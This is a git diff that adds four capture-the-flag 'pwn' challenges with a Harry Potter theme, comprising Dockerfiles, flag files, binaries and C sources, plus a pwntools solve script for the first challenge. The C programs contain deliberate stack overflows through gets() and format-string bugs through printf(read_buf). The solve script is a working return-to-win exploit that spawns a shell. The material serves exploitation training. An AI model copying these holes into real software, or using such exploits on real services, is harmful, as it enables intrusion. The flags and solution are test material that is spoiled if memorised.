diff --git a/pwn/pwn0/Dockerfile b/pwn/pwn0/Dockerfile
new file mode 100644
index 0000000000000000000000000000000000000000..6006950a961154670ef9034a03befedbdb9e72c6
--- /dev/null
+++ b/pwn/pwn0/Dockerfile
@@ -0,0 +1,19 @@
+# docker build -t pwn0 . && docker run -p 1024:1024 --rm -it pwn0
+
+FROM ubuntu:20.04
+
+RUN useradd -d /home/ctf/ -m -p ctf -s /bin/bash ctf
+RUN echo "ctf:ctf" | chpasswd
+
+WORKDIR /home/ctf
+
+COPY pwn0 .
+COPY flag .
+COPY ynetd .
+
+RUN chmod +x ynetd pwn0
+
+RUN chown -R root:root /home/ctf
+
+USER ctf
+CMD ./ynetd ./pwn0
\ No newline at end of file
diff --git a/pwn/pwn0/flag b/pwn/pwn0/flag
new file mode 100644
index 0000000000000000000000000000000000000000..31511c22f5c7164c39cf4c775212430d29a850ab
--- /dev/null
+++ b/pwn/pwn0/flag
@@ -0,0 +1 @@
+CSCG{NOW_PRACTICE_EVEN_MORE}
diff --git a/pwn/pwn0/pwn0 b/pwn/pwn0/pwn0
new file mode 100755
index 0000000000000000000000000000000000000000..9a47cb2697ec23414f014d150d06efa5dfb765a8
Binary files /dev/null and b/pwn/pwn0/pwn0 differ
diff --git a/pwn/pwn0/pwn0.c b/pwn/pwn0/pwn0.c
new file mode 100644
index 0000000000000000000000000000000000000000..fa0a9c1091a42e4a656a423772c1d27913534351
--- /dev/null
+++ b/pwn/pwn0/pwn0.c
@@ -0,0 +1,55 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <string.h>
+
+// pwn1: gcc pwn0.c -no-pie -o pwn0 -fno-stack-protector
+
+// --------------------------------------------------- SETUP
+
+void ignore_me_init_buffering() {
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void kill_on_timeout(int sig) {
+ if (sig == SIGALRM) {
+ printf("[!] Anti DoS Signal. Patch me out for testing.");
+ _exit(0);
+ }
+}
+
+void ignore_me_init_signal() {
+ signal(SIGALRM, kill_on_timeout);
+ alarm(60);
+}
+
+// --------------------------------------------------- MENU
+
+void WINgardium_leviosa() {
+ printf("┌───────────────────────┐\n");
+ printf("│ You are a Slytherin.. │\n");
+ printf("└───────────────────────┘\n");
+ system("/bin/sh");
+}
+
+void AAAAAAAA() {
+ char read_buf[0xff];
+
+ printf(" enter your magic spell:\n");
+ gets(read_buf);
+
+ printf("~ Protego!\n");
+}
+// --------------------------------------------------- MAIN
+
+void main(int argc, char* argv[]) {
+ ignore_me_init_buffering();
+ ignore_me_init_signal();
+
+ AAAAAAAA();
+}
+
+
diff --git a/pwn/pwn0/solve.py b/pwn/pwn0/solve.py
new file mode 100755
index 0000000000000000000000000000000000000000..23dc374b8790e884d4bcb03ff09e3ad71df157a3
--- /dev/null
+++ b/pwn/pwn0/solve.py
@@ -0,0 +1,49 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template pwn0
+from pwn import *
+
+# Set up pwntools for the correct architecture
+exe = context.binary = ELF(args.EXE or 'pwn0')
+
+# Many built-in settings can be controlled on the command-line and show up
+# in "args". For example, to dump all data sent/received, and disable ASLR
+# for all created processes...
+# ./exploit.py DEBUG NOASLR
+
+
+
+def start(argv=[], *a, **kw):
+ '''Start the exploit against the target.'''
+ if args.GDB:
+ return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
+ else:
+ return process([exe.path] + argv, *a, **kw)
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+tbreak main
+continue
+'''.format(**locals())
+
+#===========================================================
+# EXPLOIT GOES HERE
+#===========================================================
+# Arch: amd64-64-little
+# RELRO: Partial RELRO
+# Stack: No canary found
+# NX: NX enabled
+# PIE: No PIE (0x400000)
+
+io = start()
+
+
+io.recvuntil(b"enter your magic spell:")
+io.sendline(cyclic_find(b'qaac')*b'A' + p64(0x0000000000401380) + p64(exe.sym['WINgardium_leviosa']))
+
+
+io.interactive()
+
diff --git a/pwn/pwn0/ynetd b/pwn/pwn0/ynetd
new file mode 100644
index 0000000000000000000000000000000000000000..0b1b2b06920c5922696ce6dcec750fa6b7b7f54a
Binary files /dev/null and b/pwn/pwn0/ynetd differ
diff --git a/pwn/pwn1/Dockerfile b/pwn/pwn1/Dockerfile
new file mode 100644
index 0000000000000000000000000000000000000000..f5a285f9073069f8f879ecdd6783d61b8daf1914
--- /dev/null
+++ b/pwn/pwn1/Dockerfile
@@ -0,0 +1,25 @@
+# docker build -t pwn1 . && docker run -p 1024:1024 --rm -it pwn1
+
+FROM ubuntu:19.10
+
+# Using this repo, since the official is down (end EOL)
+RUN sed 's@archive.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+RUN sed 's@security.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+
+RUN apt-get update
+
+RUN useradd -d /home/ctf/ -m -p ctf -s /bin/bash ctf
+RUN echo "ctf:ctf" | chpasswd
+
+WORKDIR /home/ctf
+
+COPY pwn1 .
+COPY flag .
+COPY ynetd .
+
+RUN chmod +x ynetd pwn1
+
+RUN chown -R root:root /home/ctf
+
+USER ctf
+CMD ./ynetd ./pwn1
\ No newline at end of file
diff --git a/pwn/pwn1/flag b/pwn/pwn1/flag
new file mode 100644
index 0000000000000000000000000000000000000000..31511c22f5c7164c39cf4c775212430d29a850ab
--- /dev/null
+++ b/pwn/pwn1/flag
@@ -0,0 +1 @@
+CSCG{NOW_PRACTICE_EVEN_MORE}
diff --git a/pwn/pwn1/intro-pwn-1.zip b/pwn/pwn1/intro-pwn-1.zip
new file mode 100644
index 0000000000000000000000000000000000000000..873e7b124aa9de977cfc5279929c251f49e152d5
Binary files /dev/null and b/pwn/pwn1/intro-pwn-1.zip differ
diff --git a/pwn/pwn1/pwn1 b/pwn/pwn1/pwn1
new file mode 100644
index 0000000000000000000000000000000000000000..4b824c7042945dd216c3dd6a9115fbf1e5a84d89
Binary files /dev/null and b/pwn/pwn1/pwn1 differ
diff --git a/pwn/pwn1/pwn1.c b/pwn/pwn1/pwn1.c
new file mode 100644
index 0000000000000000000000000000000000000000..bad739f243451b0c5c0676becf0c6f9e6df84ddb
--- /dev/null
+++ b/pwn/pwn1/pwn1.c
@@ -0,0 +1,70 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <string.h>
+
+// pwn1: gcc pwn1.c -o pwn1 -fno-stack-protector
+
+// --------------------------------------------------- SETUP
+
+void ignore_me_init_buffering() {
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void kill_on_timeout(int sig) {
+ if (sig == SIGALRM) {
+ printf("[!] Anti DoS Signal. Patch me out for testing.");
+ _exit(0);
+ }
+}
+
+void ignore_me_init_signal() {
+ signal(SIGALRM, kill_on_timeout);
+ alarm(60);
+}
+
+// --------------------------------------------------- MENU
+
+void WINgardium_leviosa() {
+ printf("┌───────────────────────┐\n");
+ printf("│ You are a Slytherin.. │\n");
+ printf("└───────────────────────┘\n");
+ system("/bin/sh");
+}
+
+void welcome() {
+ char read_buf[0xff];
+ printf("Enter your witch name:\n");
+ gets(read_buf);
+ printf("┌───────────────────────┐\n");
+ printf("│ You are a Hufflepuff! │\n");
+ printf("└───────────────────────┘\n");
+ printf(read_buf);
+}
+
+void AAAAAAAA() {
+ char read_buf[0xff];
+
+ printf(" enter your magic spell:\n");
+ gets(read_buf);
+ if(strcmp(read_buf, "Expelliarmus") == 0) {
+ printf("~ Protego!\n");
+ } else {
+ printf("-10 Points for Hufflepuff!\n");
+ _exit(0);
+ }
+}
+// --------------------------------------------------- MAIN
+
+void main(int argc, char* argv[]) {
+ ignore_me_init_buffering();
+ ignore_me_init_signal();
+
+ welcome();
+ AAAAAAAA();
+}
+
+
diff --git a/pwn/pwn1/ynetd b/pwn/pwn1/ynetd
new file mode 100644
index 0000000000000000000000000000000000000000..0b1b2b06920c5922696ce6dcec750fa6b7b7f54a
Binary files /dev/null and b/pwn/pwn1/ynetd differ
diff --git a/pwn/pwn2/Dockerfile b/pwn/pwn2/Dockerfile
new file mode 100644
index 0000000000000000000000000000000000000000..61987932119f88ec3b439aef324dbdd5ae06cc92
--- /dev/null
+++ b/pwn/pwn2/Dockerfile
@@ -0,0 +1,24 @@
+# docker build -t pwn2 . && docker run -p 1024:1024 --rm -it pwn2
+
+FROM ubuntu:19.10
+
+# Using this repo, since the official is down (end EOL)
+RUN sed 's@archive.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+RUN sed 's@security.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+
+RUN apt-get update
+
+RUN useradd -d /home/ctf/ -m -p ctf -s /bin/bash ctf
+RUN echo "ctf:ctf" | chpasswd
+
+WORKDIR /home/ctf
+
+COPY pwn2 .
+COPY flag .
+COPY ynetd .
+
+RUN chmod +x ynetd pwn2
+RUN chown -R root:root /home/ctf
+
+USER ctf
+CMD ./ynetd ./pwn2
\ No newline at end of file
diff --git a/pwn/pwn2/flag b/pwn/pwn2/flag
new file mode 100644
index 0000000000000000000000000000000000000000..b9414bc15466b311f89a516b0671c4b5c255440a
--- /dev/null
+++ b/pwn/pwn2/flag
@@ -0,0 +1 @@
+CSCG{THIS_IS_TEST_FLAG}
\ No newline at end of file
diff --git a/pwn/pwn2/pwn2 b/pwn/pwn2/pwn2
new file mode 100644
index 0000000000000000000000000000000000000000..29dc00b6b6a8df26435c2758797eeec3470d02fc
Binary files /dev/null and b/pwn/pwn2/pwn2 differ
diff --git a/pwn/pwn2/pwn2.c b/pwn/pwn2/pwn2.c
new file mode 100644
index 0000000000000000000000000000000000000000..b70a501f9d7f0ad8127811ca9ae25f75d006e7f3
--- /dev/null
+++ b/pwn/pwn2/pwn2.c
@@ -0,0 +1,106 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <string.h>
+
+#ifndef PASSWORD
+ #define PASSWORD "CSCG{FLAG_FROM_STAGE_1}"
+#endif
+
+// pwn2: gcc pwn2.c -o pwn2
+
+// --------------------------------------------------- SETUP
+
+void ignore_me_init_buffering() {
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void kill_on_timeout(int sig) {
+ if (sig == SIGALRM) {
+ printf("[!] Anti DoS Signal. Patch me out for testing.");
+ _exit(0);
+ }
+}
+
+void ignore_me_init_signal() {
+ signal(SIGALRM, kill_on_timeout);
+ alarm(60);
+}
+
+// just a safe alternative to gets()
+size_t read_input(int fd, char *buf, size_t size) {
+ size_t i;
+ for (i = 0; i < size-1; ++i) {
+ char c;
+ if (read(fd, &c, 1) <= 0) {
+ _exit(0);
+ }
+ if (c == '\n') {
+ break;
+ }
+ buf[i] = c;
+ }
+ buf[i] = '\0';
+ return i;
+}
+
+// --------------------------------------------------- MENU
+
+void WINgardium_leviosa() {
+ printf("┌───────────────────────┐\n");
+ printf("│ You are a Slytherin.. │\n");
+ printf("└───────────────────────┘\n");
+ system("/bin/sh");
+}
+
+void check_password_stage1() {
+ char read_buf[0xff];
+ printf("Enter the password of stage 1:\n");
+ memset(read_buf, 0, sizeof(read_buf));
+ read_input(0, read_buf, sizeof(read_buf));
+ if(strcmp(read_buf, PASSWORD) != 0) {
+ printf("-10 Points for Ravenclaw!\n");
+ _exit(0);
+ } else {
+ printf("+10 Points for Ravenclaw!\n");
+ }
+}
+
+void welcome() {
+ char read_buf[0xff];
+ printf("Enter your witch name:\n");
+ gets(read_buf);
+ printf("┌───────────────────────┐\n");
+ printf("│ You are a Ravenclaw! │\n");
+ printf("└───────────────────────┘\n");
+ printf(read_buf);
+}
+
+
+void AAAAAAAA() {
+ char read_buf[0xff];
+ printf(" enter your magic spell:\n");
+ gets(read_buf);
+ if(strcmp(read_buf, "Expelliarmus") == 0) {
+ printf("~ Protego!\n");
+ } else {
+ printf("-10 Points for Ravenclaw!\n");
+ _exit(0);
+ }
+}
+// --------------------------------------------------- MAIN
+
+void main(int argc, char* argv[]) {
+ ignore_me_init_buffering();
+ ignore_me_init_signal();
+
+ check_password_stage1();
+
+ welcome();
+ AAAAAAAA();
+}
+
+
diff --git a/pwn/pwn2/ynetd b/pwn/pwn2/ynetd
new file mode 100644
index 0000000000000000000000000000000000000000..0b1b2b06920c5922696ce6dcec750fa6b7b7f54a
Binary files /dev/null and b/pwn/pwn2/ynetd differ
diff --git a/pwn/pwn3/Dockerfile b/pwn/pwn3/Dockerfile
new file mode 100644
index 0000000000000000000000000000000000000000..316d1b048e44fa93c93df594849ace1c2189df53
--- /dev/null
+++ b/pwn/pwn3/Dockerfile
@@ -0,0 +1,24 @@
+# docker build -t pwn3 . && docker run -p 1024:1024 --rm -it pwn3
+
+FROM ubuntu:19.10
+
+# Using this repo, since the official is down (end EOL)
+RUN sed 's@archive.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+RUN sed 's@security.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+
+RUN apt-get update
+
+RUN useradd -d /home/ctf/ -m -p ctf -s /bin/bash ctf
+RUN echo "ctf:ctf" | chpasswd
+
+WORKDIR /home/ctf
+
+COPY pwn3 .
+COPY flag .
+COPY ynetd .
+
+RUN chmod +x ynetd pwn3
+RUN chown -R root:root /home/ctf
+
+USER ctf
+CMD ./ynetd ./pwn3
\ No newline at end of file
diff --git a/pwn/pwn3/flag b/pwn/pwn3/flag
new file mode 100644
index 0000000000000000000000000000000000000000..b9414bc15466b311f89a516b0671c4b5c255440a
--- /dev/null
+++ b/pwn/pwn3/flag
@@ -0,0 +1 @@
+CSCG{THIS_IS_TEST_FLAG}
\ No newline at end of file
diff --git a/pwn/pwn3/libc.so.6 b/pwn/pwn3/libc.so.6
new file mode 100644
index 0000000000000000000000000000000000000000..148b002c2d2d6bace6c72d10d93c6439d87afd26
Binary files /dev/null and b/pwn/pwn3/libc.so.6 differ
diff --git a/pwn/pwn3/pwn3 b/pwn/pwn3/pwn3
new file mode 100755
index 0000000000000000000000000000000000000000..ee79bb8f31c83ec090d7cc77d8418be0abc02e49
Binary files /dev/null and b/pwn/pwn3/pwn3 differ
diff --git a/pwn/pwn3/pwn3.c b/pwn/pwn3/pwn3.c
new file mode 100644
index 0000000000000000000000000000000000000000..5ca05019368e5bdcbfcf0f60b90f6e02a17d714e
--- /dev/null
+++ b/pwn/pwn3/pwn3.c
@@ -0,0 +1,105 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <string.h>
+
+#ifndef PASSWORD
+ #define PASSWORD "CSCG{XXXXXXXXXXXXXXXXXXXX}"
+#endif
+
+// pwn3: gcc pwn3.c -o pwn3
+
+// --------------------------------------------------- SETUP
+
+void ignore_me_init_buffering() {
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void kill_on_timeout(int sig) {
+ if (sig == SIGALRM) {
+ printf("[!] Anti DoS Signal. Patch me out for testing.");
+ _exit(0);
+ }
+}
+
+void ignore_me_init_signal() {
+ signal(SIGALRM, kill_on_timeout);
+ alarm(60);
+}
+
+// just a safe alternative to gets()
+size_t read_input(int fd, char *buf, size_t size) {
+ size_t i;
+ for (i = 0; i < size-1; ++i) {
+ char c;
+ if (read(fd, &c, 1) <= 0) {
+ _exit(0);
+ }
+ if (c == '\n') {
+ break;
+ }
+ buf[i] = c;
+ }
+ buf[i] = '\0';
+ return i;
+}
+
+// --------------------------------------------------- MENU
+
+void WINgardium_leviosa() {
+ printf("They has discovered our secret, Nagini.\n");
+ printf("It makes us vulnerable.\n");
+ printf("We must deploy all our forces now to find them.\n");
+ // system("/bin/sh") it's not that easy anymore.
+}
+
+void check_password_stage2() {
+ char read_buf[0xff];
+ printf("Enter the password of stage 2:\n");
+ memset(read_buf, 0, sizeof(read_buf));
+ read_input(0, read_buf, sizeof(read_buf));
+ if(strcmp(read_buf, PASSWORD) != 0) {
+ printf("-10 Points for Gryffindor!\n");
+ _exit(0);
+ } else {
+ printf("+10 Points for Gryffindor!");
+ }
+}
+
+void welcome() {
+ char read_buf[0xff];
+ printf("Enter your witch name:\n");
+ gets(read_buf);
+ printf("┌───────────────────────┐\n");
+ printf("│ You are a Gryffindor! │\n");
+ printf("└───────────────────────┘\n");
+ printf(read_buf);
+}
+
+void AAAAAAAA() {
+ char read_buf[0xff];
+
+ printf(" enter your magic spell:\n");
+ gets(read_buf);
+ if(strcmp(read_buf, "Expelliarmus") == 0) {
+ printf("~ Protego!\n");
+ } else {
+ printf("-10 Points for Gryffindor!\n");
+ _exit(0);
+ }
+}
+
+// --------------------------------------------------- MAIN
+
+void main(int argc, char* argv[]) {
+ ignore_me_init_buffering();
+ ignore_me_init_signal();
+
+ check_password_stage2();
+
+ welcome();
+ AAAAAAAA();
+}
diff --git a/pwn/pwn3/ynetd b/pwn/pwn3/ynetd
new file mode 100644
index 0000000000000000000000000000000000000000..0b1b2b06920c5922696ce6dcec750fa6b7b7f54a
Binary files /dev/null and b/pwn/pwn3/ynetd differ